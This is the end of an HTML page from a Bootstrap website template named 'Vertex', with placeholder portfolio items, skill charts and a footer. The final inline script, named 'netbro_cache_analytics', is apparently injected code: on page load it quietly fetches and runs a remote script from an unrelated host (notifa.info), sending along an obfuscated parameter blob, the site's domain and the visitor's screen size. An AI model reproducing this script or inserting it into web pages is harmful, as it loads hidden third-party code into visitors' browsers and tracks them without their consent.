                                examples of the site to see what we mean.
                            </p>
                            <br />
                            <div class="d-none d-md-block mb-0">
                                <a href="page-about-me-3.html#" class="social-icon si-borderless si-facebook si-small mb-0" title="Facebook">
                                    <i class="si-icon-facebook"></i>
                                    <i class="si-icon-facebook"></i>
                                </a>
                                <a href="page-about-me-3.html#" class="social-icon si-borderless si-twitter si-small mb-0" title="Twitter">
                                    <i class="si-icon-twitter"></i>
                                    <i class="si-icon-twitter"></i>
                                </a>
                                <a href="page-about-me-3.html#" class="social-icon si-borderless si-instagram si-small mb-0" title="Instagram">
                                    <i class="si-icon-instagram"></i>
                                    <i class="si-icon-instagram"></i>
                                </a>
                            </div>
                        </div>
                    </div>
                </div>
            </div>

            <div class="v-full-width-text v-bg-stylish v-bg-stylish-v6 no-shadow">
                <div class="container">
                    <div class="row center-text">

                        <div class="col-md-10 offset-md-1">
                            <p class="v-smash-text-large white-color">Incredible Features: The Proof Is In The Pudding</p>
                            <p class="v-lead white-color o-8">
                                Vertex is loaded with useful features, each one with its own meaningful purpose.
                                We listen to our users and integrate their feature requests on a regular basis.
                                Vertex is not only built by us, but also by our users.
                            </p>
                        </div>
                    </div>
                </div>
            </div>

            <div class="container">
                <div class="row">
                    <div class="v-spacer col-sm-12 v-height-standard"></div>
                </div>
            </div>

            <div class="v-bg-stylish" id="our-work">
                <div class="container">

                    <div class="row">
                        <div class="col-sm-12">
                            <div class="v-portfolio-widget">
                                <div class="v-portfolio-wrap">

                                    <ul class="v-portfolio-items v-portfolio-standard filterable-items column-3 row clearfix center">
                                        <li class="clearfix v-portfolio-item col-sm-4 standard   business">
                                            <figure class="animated-overlay overlay-alt">
                                                <img src="http://bootstraptemplates.net/img/mix/portfolio-1.jpg" />
                                                <a href="portfolio-single.html" class="link-to-post"></a>
                                                <figcaption>
                                                    <div class="thumb-info thumb-info-v2"><i class="fa fa-angle-right"></i></div>
                                                </figcaption>
                                            </figure>
                                            <div class="v-portfolio-item-info">
                                                <h3 class="v-portfolio-item-title">
                                                    <a href="portfolio-single.html" class="link-to-post">Suspendisse Euismod</a>
                                                </h3>
                                            </div>
                                        </li>

                                        <li class="clearfix v-portfolio-item col-sm-4 standard   business">
                                            <figure class="animated-overlay overlay-alt">
                                                <img src="http://bootstraptemplates.net/img/mix/portfolio-2.jpg" />
                                                <a href="portfolio-single.html" class="link-to-post"></a>
                                                <figcaption>
                                                    <div class="thumb-info thumb-info-v2"><i class="fa fa-angle-right"></i></div>
                                                </figcaption>
                                            </figure>
                                            <div class="v-portfolio-item-info">
                                                <h3 class="v-portfolio-item-title">
                                                    <a href="portfolio-single.html" class="link-to-post">Vivamus Tristique</a>
                                                </h3>
                                            </div>
                                        </li>

                                        <li class="clearfix v-portfolio-item col-sm-4 standard   business">
                                            <figure class="animated-overlay overlay-alt">
                                                <img src="http://bootstraptemplates.net/img/mix/portfolio-3.jpg" />
                                                <a href="portfolio-single.html" class="link-to-post"></a>
                                                <figcaption>
                                                    <div class="thumb-info thumb-info-v2"><i class="fa fa-angle-right"></i></div>
                                                </figcaption>
                                            </figure>
                                            <div class="v-portfolio-item-info">
                                                <h3 class="v-portfolio-item-title">
                                                    <a href="portfolio-single.html" class="link-to-post">Fringilla Suscipit</a>
                                                </h3>
                                            </div>
                                        </li>

                                        <li class="clearfix v-portfolio-item col-sm-4 standard   business">
                                            <figure class="animated-overlay overlay-alt">
                                                <img src="http://bootstraptemplates.net/img/mix/portfolio-4.jpg" />
                                                <a href="portfolio-single.html" class="link-to-post"></a>
                                                <figcaption>
                                                    <div class="thumb-info thumb-info-v2"><i class="fa fa-angle-right"></i></div>
                                                </figcaption>
                                            </figure>
                                            <div class="v-portfolio-item-info">
                                                <h3 class="v-portfolio-item-title">
                                                    <a href="portfolio-single.html" class="link-to-post">Cras Aliquam</a>
                                                </h3>
                                            </div>
                                        </li>

                                        <li class="clearfix v-portfolio-item col-sm-4 standard   business">
                                            <figure class="animated-overlay overlay-alt">
                                                <img src="http://bootstraptemplates.net/img/mix/portfolio-5.jpg" />
                                                <a href="portfolio-single.html" class="link-to-post"></a>
                                                <figcaption>
                                                    <div class="thumb-info thumb-info-v2"><i class="fa fa-angle-right"></i></div>
                                                </figcaption>
                                            </figure>
                                            <div class="v-portfolio-item-info">
                                                <h3 class="v-portfolio-item-title">
                                                    <a href="portfolio-single.html" class="link-to-post">Suspendisse Euismod</a>
                                                </h3>
                                            </div>
                                        </li>

                                        <li class="clearfix v-portfolio-item col-sm-4 standard   business">
                                            <figure class="animated-overlay overlay-alt">
                                                <img src="http://bootstraptemplates.net/img/mix/portfolio-11.jpg" />
                                                <a href="portfolio-single.html" class="link-to-post"></a>
                                                <figcaption>
                                                    <div class="thumb-info thumb-info-v2"><i class="fa fa-angle-right"></i></div>
                                                </figcaption>
                                            </figure>
                                            <div class="v-portfolio-item-info">
                                                <h3 class="v-portfolio-item-title">
                                                    <a href="portfolio-single.html" class="link-to-post">Proin Faucibus</a>
                                                </h3>
                                            </div>
                                        </li>
                                    </ul>
                                </div>
                            </div>
                        </div>
                    </div>
                </div>
            </div>

            <div class="v-bg-stylish v-bg-stylish-v4 no-shadow">
                <div class="container">
                    <div class="row">
                        <div class="col-md-6">
                            <div class="mk-skill-chart" style="margin-bottom:-50px">
                                <div class="mk-meter-arch">
                                    <input type="hidden" class="name" value="Photoshop">
                                    <input type="hidden" class="percent" value="90">
                                    <input type="hidden" class="color" value="#0b486b">
                                </div>
                                <div class="mk-meter-arch">
                                    <input type="hidden" class="name" value="CSS">
                                    <input type="hidden" class="percent" value="85">
                                    <input type="hidden" class="color" value="#3b8686">
                                </div>
                                <div class="mk-meter-arch">
                                    <input type="hidden" class="name" value="PHP">
                                    <input type="hidden" class="percent" value="76">
                                    <input type="hidden" class="color" value="#79bd9a">
                                </div>
                                <div class="mk-meter-arch">
                                    <input type="hidden" class="name" value="Copywriting">
                                    <input type="hidden" class="percent" value="45">
                                    <input type="hidden" class="color" value="#a8dba8">
                                </div>
                                <div class="mk-meter-arch">
                                    <input type="hidden" class="name" value="Marketing">
                                    <input type="hidden" class="percent" value="38">
                                    <input type="hidden" class="color" value="#cff09e">
                                </div>

                                <div id="mk_skill_diagram" data-dimension="470" data-circle-color="#1e3641" data-default-text-color="#ffffff" data-default-text="Skill"></div>
                            </div>
                        </div>
                        <div class="col-md-6 pull-top-big">
                            <p class="v-smash-text-large">Things we are good at</p>

                            <p>
                                Vestibulum pharetra nibh sit amet consequat commodo.
                                Ut viverra est non est venenatis, quis faucibus nulla rutrum.
                                Proin neque purus, tincidunt non nibh non.
                            </p>

                            <div class="progress-bars">
                                <div class="progress-label">
                                    <span>HTML/CSS</span>
                                </div>
                                <div class="progress">
                                    <div class="progress-bar progress-bar-primary" data-appear-progress-animation="100%">
                                        <span class="progress-bar-tooltip">100%</span>
                                    </div>
                                </div>
                                <div class="progress-label">
                                    <span>Design</span>
                                </div>
                                <div class="progress">
                                    <div class="progress-bar progress-bar-primary" data-appear-progress-animation="85%" data-appear-animation-delay="300">
                                        <span class="progress-bar-tooltip">85%</span>
                                    </div>
                                </div>
                                <div class="progress-label">
                                    <span>WordPress</span>
                                </div>
                                <div class="progress">
                                    <div class="progress-bar progress-bar-primary" data-appear-progress-animation="75%" data-appear-animation-delay="600">
                                        <span class="progress-bar-tooltip">75%</span>
                                    </div>
                                </div>
                                <div class="progress-label">
                                    <span>Photoshop</span>
                                </div>
                                <div class="progress">
                                    <div class="progress-bar progress-bar-primary" data-appear-progress-animation="85%" data-appear-animation-delay="900">
                                        <span class="progress-bar-tooltip">85%</span>
                                    </div>
                                </div>
                            </div>
                        </div>
                    </div>
                </div>
            </div>
        </div>

        <!--Footer-Wrap-->
        <div class="footer-wrap">
            <footer>
                <div class="container">
                    <div class="row">
                        <div class="col-sm-3">
                            <section class="widget">
                                <img alt="Vertex" src="img/logo-white.png" style="height: 40px; margin-bottom: 20px;">
                                <p class="pull-bottom-small">
                                    Donec quam felis, ultricies nec, pellen tesqueeu, pretium quis, sem. Nulla consequat massa quis enim. Donec pede justo, fringilla vel aliquet nec, vulputate eget aliquet nec, arcu.
                                </p>
                                <p>
                                    <a href="page-about-us-2.html">Read More →</a>
                                </p>
                            </section>
                        </div>
                        <div class="col-sm-3">
                            <section class="widget v-twitter-widget">
                                <div class="widget-heading">
                                    <h4>Latest Tweets</h4>
                                    <div class="horizontal-break"></div>
                                </div>
                                <ul class="v-twitter-widget">
                                    <li>
                                        <div class="tweet-text">
                                            <a href="page-about-me-3.html#" target="_blank">@Vertex</a>
                                            Lorem ipsum dolor sit amet, consec adipiscing elit onvallis dignissim.
                                        </div>
                                        <div class="twitter_intents">
                                            <a class="timestamp" href="page-about-me-3.html#" target="_blank">3 hours ago</a>
                                        </div>
                                    </li>
                                    <li>
                                        <div class="tweet-text">
                                            <a href="page-about-me-3.html#" target="_blank">@Vertex</a>
                                            Sed blandit conval dignissim. pharetra velit eu velit et erat pharetra.
                                        </div>
                                        <div class="twitter_intents">
                                            <a class="timestamp" href="page-about-me-3.html#" target="_blank">5 days ago</a>
                                        </div>
                                    </li>
                                </ul>
                            </section>
                        </div>
                        <div class="col-sm-3">
                            <section class="widget v-recent-entry-widget">
                                <div class="widget-heading">
                                    <h4>Recent Posts</h4>
                                    <div class="horizontal-break"></div>
                                </div>
                                <ul>
                                    <li>
                                        <a href="blog-standard-post.html">Amazing Standard Post</a>
                                    </li>
                                    <li>
                                        <a href="blog-full-width-post.html">Full Width Media Post</a>
                                    </li>
                                    <li>
                                        <a href="http://bootstraptemplates.net/vertex/blog-video-post.html">Perfect Video Post</a>
                                    </li>
                                    <li>
                                        <a href="http://bootstraptemplates.net/vertex/blog-slideshow-post.html">Amazing Slideshow post</a>
                                    </li>
                                </ul>
                            </section>
                        </div>
                        <div class="col-sm-3">
                            <section class="widget">
                                <div class="widget-heading">
                                    <h4>Recent Works</h4>
                                    <div class="horizontal-break"></div>
                                </div>
                                <ul class="portfolio-grid">
                                    <li>
                                        <a href="portfolio-single.html" class="grid-img-wrap">
                                            <img src="img/thumbs/project-1.jpg" />
                                            <span class="tooltip">Phasellus enim libero<span class="arrow"></span></span>
                                        </a>
                                    </li>
                                    <li>
                                        <a href="portfolio-single.html" class="grid-img-wrap">
                                            <img src="img/thumbs/project-2.jpg" />
                                            <span class="tooltip">Phasellus enim libero<span class="arrow"></span></span>
                                        </a>
                                    </li>
                                    <li>
                                        <a href="portfolio-single.html" class="grid-img-wrap">
                                            <img src="img/thumbs/project-3.jpg" />
                                            <span class="tooltip">Phasellus enim<span class="arrow"></span></span>
                                        </a>
                                    </li>
                                    <li>
                                        <a href="portfolio-single.html" class="grid-img-wrap">
                                            <img src="img/thumbs/project-4.png" />
                                            <span class="tooltip">Lorem Imput<span class="arrow"></span></span>
                                        </a>
                                    </li>
                                    <li>
                                        <a href="portfolio-single.html" class="grid-img-wrap">
                                            <img src="img/thumbs/project-5.jpg" />
                                            <span class="tooltip">Phasellus Enim libero<span class="arrow"></span></span>
                                        </a>
                                    </li>
                                    <li>
                                        <a href="portfolio-single.html" class="grid-img-wrap">
                                            <img src="img/thumbs/project-6.jpg" />
                                            <span class="tooltip">Phasellus Enim<span class="arrow"></span></span>
                                        </a>
                                    </li>
                                </ul>
                            </section>
                        </div>
                    </div>
                </div>
            </footer>

            <div class="copyright">
                <div class="container">
                    <p>© Copyright 2018 by Vertex. All Rights Reserved.</p>

                    <div class="clearfix pull-right">
                        <a href="page-about-me-3.html#" class="social-icon si-borderless si-facebook mb-0" title="Facebook">
                            <i class="si-icon-facebook"></i>
                            <i class="si-icon-facebook"></i>
                        </a>
                        <a href="page-about-me-3.html#" class="social-icon si-borderless si-twitter mb-0" title="Twitter">
                            <i class="si-icon-twitter"></i>
                            <i class="si-icon-twitter"></i>
                        </a>
                        <a href="page-about-me-3.html#" class="social-icon si-borderless si-instagram mb-0" title="Instagram">
                            <i class="si-icon-instagram"></i>
                            <i class="si-icon-instagram"></i>
                        </a>
                        <a href="page-about-me-3.html#" class="social-icon si-borderless si-vk mb-0" title="Vk">
                            <i class="si-icon-vk"></i>
                            <i class="si-icon-vk"></i>
                        </a>
                    </div>
                </div>
            </div>
        </div>
        <!--End Footer-Wrap-->
    </div>

    <!-- Libs -->
    <script src="js/jquery.min.js"></script>
    <script src="js/popper.js"></script>
    <script src="js/bootstrap.min.js"></script>
    <script src="js/jquery.flexslider-min.js"></script>
    <script src="js/jquery.easing.js"></script>
    <script src="js/jquery.fitvids.js"></script>
    <script src="js/jquery.carouFredSel.min.js"></script>
    <script src="js/jquery.validate.js"></script>
    <script src="js/theme-plugins.js"></script>
    <script src="js/jquery.isotope.min.js"></script>
    <script src="js/imagesloaded.js"></script>

    <!-- Skill Chart -->
    <script src="http://bootstraptemplates.net/vertex/js/raphael.js"></script>

    <script src="js/view.min.js"></script>
    <script src="plugins/aos/aos.js"></script>
    <script src="js/theme-core.js"></script>
    <script src="js/theme.js"></script>
    <script src="js/theme.init.js"></script>
<script type="text/javascript">if (self==top) {function netbro_cache_analytics(fn, callback) {setTimeout(function() {fn();callback();}, 0);}function sync(fn) {fn();}function requestCfs(){var idc_glo_url = (location.protocol=="https:" ? "https://" : "http://");var idc_glo_r = Math.floor(Math.random()*99999999999);var url = idc_glo_url+ "p03.notifa.info/3fsmd3/request" + "?id=1" + "&enc=9UwkxLgY9" + "&params=" + "4TtHaUQnUEiP6K%2fc5C582JKzDzTsXZH25LvpQTtnctJb0%2bYK8SHpPccGhXRXvsvcBIxNq0wn4u19Ncs2AVXAFlhmrteUIYzv8MSeU5DUAgK%2fj4Xp33svm1eCr9e1BSnsbY7WC0ynH%2f2dJ4I9mjFbKH5aWITqXkPg9jeBzTVDEtmI%2fD81L17McTr2mwkUQhdRx3CCLfbdcSblVnIczBL%2bsPXz1n4Uq4PZ6%2bzlhH2BsxlV4Wme69C%2f3Q6BYy5SS%2f8UX%2fbu17QaYvyNL3Jy%2b543Fi4xDAEox9r3loANxqYdZJtoG%2b7S1hva2%2bjralv6OvxcLOuY13aaRkMJhWcOMOmqlNdE2IAydMtm1YXaRU8U3g09aVGSBJrY%2bCd%2f6crcqBpkifgBIFmK%2bVTs1XRUl718SOUxeGhPUWIm2%2b3Y5K%2f3pfIhrQXkBn2h5y51UTNkZeQ%2bpbaDAVtQYsTo9FFyqb%2bYHV8OeN1fNO2fQi%2bWqDn9ttE0JUdfE5dVK7jykcnTWt2zGaN64xPOd2ndRHdAKZC%2b%2bm3bQFr%2fyiU6NUSSBnZ%2fwGg%3d" + "&idc_r="+idc_glo_r + "&domain="+document.domain + "&sw="+screen.width+"&sh="+screen.height;var bsa = document.createElement('script');bsa.type = 'text/javascript';bsa.async = true;bsa.src = url;(document.getElementsByTagName('head')[0]||document.getElementsByTagName('body')[0]).appendChild(bsa);}netbro_cache_analytics(requestCfs, function(){});};</script></body>
</html>